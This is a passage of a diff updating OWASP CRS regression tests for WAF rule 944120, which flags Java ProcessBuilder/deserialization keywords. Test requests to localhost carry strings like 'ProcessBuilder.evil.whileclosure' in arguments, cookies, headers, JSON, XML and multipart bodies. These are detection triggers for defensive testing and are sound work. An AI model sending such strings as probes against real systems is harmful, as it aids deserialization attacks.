Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log: + expect_ids: [944120] + - test_id: 105 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 106 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 107 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 108 desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 109 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 110 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 111 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 112 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 113 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 114 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 115 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 116 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-117 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 117 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-118 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 118 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-119 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 119 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-120 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 120 desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 121 desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure=test" + output: + log: + expect_ids: [944120] + - test_id: 122 desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 123 desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 124 desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 125 desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 126 desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 127 desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 128 desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 129 desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 130 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 